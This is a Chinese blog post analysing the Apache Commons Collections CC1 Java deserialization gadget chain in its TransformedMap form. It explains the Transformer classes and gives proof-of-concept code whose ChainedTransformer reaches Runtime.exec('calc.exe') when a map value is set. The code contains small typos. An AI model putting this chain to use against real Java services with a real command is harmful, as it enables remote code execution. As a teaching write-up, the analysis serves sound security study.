java 反序列化CC1链分析(TransformedMap)

已于 2022-03-14 20:11:20 修改
阅读量1.4k 收藏 1
点赞数
文章标签: java 开发语言
于 2022-03-14 19:57:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wsitcj/article/details/123486319
版权

Map类 --> TransformedMap

Map类是存储键值对的数据结构。 Apache Commons Collections中实现了TransformedMap ,该类可以在一个元素被添加/删除/或是被修改时会调用transform方法自动进行特定的修饰变换,具体的变换逻辑由Transformer类定义。也就是说,TransformedMap类中的数据发生改变时,可以自动对进行一些特殊的变换,比如在数据改变时,进行一些我们提前设定好的操作。

TransformedMap.decorate方法,预期是对Map类的数据结构进行转化,该方法有三个参数。

第一个参数为待转化的Map对象
第二个参数为Map对象内的key要经过的转化方法(可为单个方法,也可为链,也可为空)
第三个参数为Map对象内的value要经过的转化方法

Transformer接口

transform方法
在这里插入图片描述
我们可以看到该类接收一个对象,获取该对象的名称,然后调用了一个invoke反射方法。另外,多个Transformer还能串起来,形成ChainedTransformer。当触发时,ChainedTransformer可以按顺序调用一系列的变换。

常用的一些实现Transformer接口的类

ConstantTransformer
把一个对象转化为常量,并返回。

InvokerTransformer
通过反射,返回一个对象

ChainedTransformer
ChainedTransformer为链式的Transformer,会挨个执行我们定义Transformer

InvokerTransformer代码

public class InvokerTransformer implements Transformer, Serializable {

...

    /*
        Input参数为要进行反射的对象,
        iMethodName,iParamTypes为调用的方法名称以及该方法的参数类型
        iArgs为对应方法的参数
        在invokeTransformer这个类的构造函数中我们可以发现,这三个参数均为可控参数
    */
    public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
        super();
        iMethodName = methodName;
        iParamTypes = paramTypes;
        iArgs = args;
    }

    public Object transform(Object input) {
        if (input == null) {
            return null;
        }
        try {
            Class cls = input.getClass();
            Method method = cls.getMethod(iMethodName, iParamTypes);
            return method.invoke(input, iArgs);

        } catch (NoSuchMethodException ex) {
            throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' does not exist");
        } catch (IllegalAccessException ex) {
            throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
        } catch (InvocationTargetException ex) {
            throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' threw an exception", ex);
        }
    }

}

构造

那么我们的总体思路就是

1)构造一个Map和一个能够执行代码的ChainedTransformer,
2)生成一个TransformedMap实例
3)利用MapEntry的setValue()函数对TransformedMap中的键值进行修改
4)触发我们构造的之前构造的链式Transforme(即ChainedTransformer)进行自动转换

public static void main(String[] args) throws Exception {
    //transformers: 一个transformer链,包含各类transformer对象(预设转化逻辑)的转化数组
    Transformer[] transformers = new Transformer[] {
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer("getMethod", 
            new Class[] {String.class, Class[].class }, new Object[] {
            "getRuntime", new Class[0] }),
        new InvokerTransformer("invoke", 
            new Class[] {Object.class, Object[].class }, new Object[] {
            null, new Object[0] }),
        new InvokerTransformer("exec", 
            new Class[] {String.class }, new Object[] {"calc.exe"})};

    //首先构造一个Map和一个能够执行代码的ChainedTransformer,以此生成一个TransformedMap
    Transformer transformedChain = new ChainedTransformer(transformers);

    Map innerMap = new hashMap();
    innerMap.put("1", "zhang");

    Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
    //触发Map中的MapEntry产生修改(例如setValue()函数
    Map.Entry onlyElement = (Entry) outerMap.entrySet().iterator().next();
    
    onlyElement.setValue("foobar");
    /*代码运行到setValue()时,就会触发ChainedTransformer中的一系列变换函数:
       首先通过ConstantTransformer获得Runtime类
       进一步通过反射调用getMethod找到invoke函数
       最后再运行命令calc.exe。
    */
}

参考 https://www.cnblogs.com/ssooking/p/5875215.html

放空 123
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java安全(七) 反序列化3 CC利用链 TransformedMap版
weixin_45694388的博客
04-21 3389
给个关注?宝儿! 给个关注?宝儿! 给个关注?宝儿! 关注公众号:b1gpig信息安全,文章推送不错过 众所周知,CommonCollections利⽤链是作为反序列化学习不可绕i过的一关 图解 先挂一张wh1te8ea的利用链图解,非常直观! 代码demo 分析: 代码使用了phith0n大佬的代码,对原本复杂的源码进行了优化,适合复现以及更加深刻理解 demo代码: package test.org.vulhub.Ser; import org.apache.commons.collecti.
对象的序列化与反序列化
terase梅
12-03 929
本文中介绍三种Android中常见的序列化的使用序列化是把对象以二进制的形式写入硬盘或者文件中,这样对象就能存入数据库、文件中或者在网络上进行传输。反序列化是把二进制的对象数据读取出来并还原成对象的过程,这个对象的数据和序列化之前是一样的。使用Serializable方式进行序列化,需要让要序列化的对象接口。serialVersionUID:建议主动生成一个固定的序列号。Idea或者AS中可以通过系统设置,让系统自己生成这个ID,,然后在代码中,点击点击类名:,就能生成UID.如果不主动为这个字段设值,ja
java反序列化 cc链1 分析_java反序列化cc1链分析
m0_63174618的博客
04-07 248
在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.但是注意这里在使用get方法之前,这里有两个if判断,第一个判断是看我们代理对象触发的方法是不是equals这个不用管啥,也用不到,但是看到第二个判断,他是判断,我们代理对象使用的方法的参数是不是无参,如果不是就输出一个报错,一旦这个报错输出我们就到不了下面了。这里我们看到,接受构造函数中的我们给他的类,然后他的transformers方法,不管他的参数的类型,只返回我们构造的时候给他的类型,好神奇正好需要。
Java安全 反序列化(3) CC1链-TransformedMap版
最新发布
Innocence_0的博客
05-29 1116
核心概念入口类必须重写readObject通过不同类的同名方法进行跳转连接下一篇我们从LazyMap出发实现RCE接下来我将给各位同学划分一张学习计划表!
【入坑JAVA安全】手把手教你写反序列化POC
一个安全研究员
04-15 1946
要是你是妹子就更好了~
这么把一个map对象序列化_Fastjson序列化与反序列化JAVA五种常用对象
weixin_34981697的博客
01-21 656
1.Fastjson简介Fastjson是阿里巴巴的开源JSON解析库,支持任何JAVA对象与JSON格式的序列化与反序列化;序列化:JAVA对象转换为JSON字符串;反序列化:JSON字符串转换为JAVA对象;提供服务器端、安卓客户端两种解析工具,性能表现较好;允许转换预先存在的无法修改的对象(只有class、无源代码);Java泛型的广泛支持;允许对象的自定义表示、允许自定义序列化类;支持任意...
Java Map对象的序列化和反序列化
BangLiSang的博客
12-31 2198
import java.io.*; import java.util.Date; import java.util.HashMap; import java.util.Map; public class OffsetUtil { private OffsetUtil() { } /** * 判断文件存不存在 * * @param path 文件路径 * @return 存在是true,否则为false */ public
手把手教你写JAVA反序列化的POC
Ms08067安全实验室
07-20 2018
0x01 前言前面,我们了解了java的序列化机制,也知道在什么情况下会出现漏洞,为了对反序列化漏洞有个更直观的认识,这里就来说一说存在于apache commons-collectio...
java反序列化工具
11-21
Java反序列化是一种将已序列化的对象状态转换回对象的过程,它是Java平台中持久化数据的一种常见方式。在Java应用程序中,序列化用于保存对象的状态以便稍后恢复,或者在网络间传输对象。然而,这个过程也可能引入...
深入分析Java的序列化与反序列化
12-22
本文通过分析ArrayList的序列化来介绍Java序列化的相关内容。主要涉及到以下几个问题:  怎么实现Java的序列化  为什么实现了java.io.Serializable接口才能被序列化  transient的作用是什么  怎么自定义序列...
基于混合分析的Java反序列化利用链挖掘方法
05-14
总的来说,基于混合分析的Java反序列化利用链挖掘方法是针对Java应用安全的一种重要技术进步,它通过自动化工具减轻了人工分析的负担,提升了漏洞检测的能力,对于保障Java应用的安全具有重要意义。这一方法的应用有...
java反序列化利用程序UI版Beta1.1.rar
07-20
如"java反序列化利用程序UI版Beta1.1"这样的工具,可能是为了帮助安全研究人员测试和理解反序列化漏洞的工作原理,通过图形用户界面(GUI)提供了一种更直观的方式来实验和分析Java反序列化过程。 9. **安全编程...
Java中对象序列化与反序列化详解
09-03
本文将深入探讨Java中的对象序列化与反序列化的概念、原理、实现方法以及相关的注意事项。 **一、对象序列化的概念和作用** 对象序列化是将一个Java对象转换成字节流的过程,这个字节流可以存储在磁盘上,也可以在...
6-java安全——java反序列化漏洞利用链
网络安全
07-01 4046
本篇将学习java反序列化漏洞原理,然后结合一个apache commons-collections组件反序列化漏洞来学习如何构造利用链。 我们知道序列化操作主要是由ObjectOutputStream类的 writeObject()方法来完成,反序列化操作主要是由ObjectInputStream类的readObject()方法来完成。当可序列化对象重写了readObject方法后,在反序列化时一般会调用序列化对象的readObject方法。 在Student类中重写ObjectInputSt
commons-collections使用介绍之Map
蒋固金(jianggujin)的专栏
04-07 9620
介绍完了List,我怕们继续来看commons-collections中为我们提供的Map相关的实现类。
谨慎使用Scala Map的mapValues, 你需要的可能是transform
热门推荐
Laurence的技术博客
05-01 1万+
没有踩过mapValues的坑之前,我相信大多数人会认为mapValues和所有其他map类方法的逻辑是一样的:对Map里所有的value施加一个map函数,返回一个新的Map。但实际情况却并不这么简单,还是先看一段“诡异”的代码吧 (本文原文出处: 本文原文链接: http://blog.csdn.net/bluishglc/article/details/80156218 转载请注明出处。):...
java反序列之CC1
Go_change的博客
05-09 230
序列化是将对象的状态信息转换为可以存储或传输的形式的过程,通俗的说,就是将对象转换成另一种形式,以方便跨平台存储和网络传输。反序列化则是将上述过程反过来进行的操作。在Java中任何一个对象必须要实现Serializable接口才可以执行序列化和反序列化操作。
Java安全研究——反序列化漏洞之CC链
weixin_43889136的博客
04-13 4068
0x01前言 apachecommons-collections组件下的反序列化漏洞,自从该组件被爆出漏洞后,许多安全研究员相继挖掘到java多种组件的漏洞,危害严重。本人也是初学Java审计不久,技术薄弱,所以在此做一个cc链的学习总结,如有错误还请大佬指出。 若本文有侵权行为,请立即私信,将全面修正。 0x02漏洞环境 JDK1.8 Apache Commons Collections 3.2版本 0x03反序列化漏洞 序列化是将对象的状态信息转换为可以存储或传输的形式的过程,通俗的说,.
CC1(TransformMap版)
..
10-09 809
借用闪烁之狐的介绍是Apache软件基金会的项目,曾经隶属于Jakarta项目。Commons的目的是提供可重用的、解决各种实际的通用问题且开源的Java代码。Commons由三部分组成:Proper(是一些已发布的项目)、Sandbox(是一些正在开发的项目)和Dormant(是一些刚启动或者已经停止维护的项目)。包为Java标准的Collections API提供了相当好的补充。在此基础上对其常用的数据结构操作进行了很好的封装、抽象和补充。
Java反序列化利用链挖掘:混合分析方法
"这篇学术文章探讨了一种基于混合分析的Java反序列化利用链挖掘方法,旨在解决Java应用中反序列化漏洞的安全问题。作者来自上海交通大学网络空间安全学院,他们在2022年4月发表于《网络与信息安全学报》上。文章指出...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值